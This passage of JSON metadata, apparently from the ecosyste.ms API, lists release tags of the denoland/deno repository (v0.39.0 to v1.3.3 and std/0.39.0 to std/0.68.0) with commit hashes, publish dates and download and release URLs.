no/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/s